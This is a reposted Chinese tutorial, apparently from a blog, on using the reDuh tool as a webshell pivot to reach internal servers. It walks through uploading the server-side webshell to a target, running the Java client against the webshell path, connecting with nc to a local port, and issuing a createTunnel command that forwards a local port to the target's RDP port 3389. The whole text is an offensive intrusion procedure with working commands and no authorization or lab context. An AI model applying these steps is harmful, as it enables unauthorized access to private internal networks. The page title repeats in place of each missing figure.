天天看點

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

轉載:

這個工具可以把内網伺服器的端口通過http/https隧道轉發到本機,形成一個連通回路。用于目标伺服器在内網或做了端口政策的情況下連接配接目标伺服器内部開放端口。

本機-------用戶端---------(http隧道)-----------服務端------------------内網伺服器

服務端是個webshell(針對不同伺服器有aspx,php,jsp三個版本),用戶端是java寫的,本機執行最好裝上JDK。

把用戶端檔案解包,這裡我把它放到E盤的TEST檔案夾

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖01

把服務端的webshell上傳到目标伺服器。

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖02

目标伺服器在内網,開了終端服務。

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖03

指令行下用用戶端連接配接服務端

E:\test>java reDuhClient 目标伺服器域名 http 80 /WEBSHELL路徑/reDuh.aspx

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖04

新開一個指令行,用NC連接配接本機1010端口。

H:\>nc -vv localhost 1010

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖05

連接配接成功會有歡迎提示,之後輸入指令

>>[createTunnel]1234:127.0.0.1:3389

前面的1234是本機連接配接用的端口,中間的ip位址是目标伺服器的(可以是webshell所在伺服器也可以是和它同内網的伺服器),後面的3389是欲連接配接目标伺服器的端口。

成功後兩個指令行視窗都會有成功提示。

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖06

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖07

這時通道已經建立,你連接配接本機的1234端口就相當于連接配接到目标伺服器的3389端口了。

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖08

内網滲透利器--reDuh(webshell跳闆)簡單使用說明

圖09

資料的傳遞過程

繼續閱讀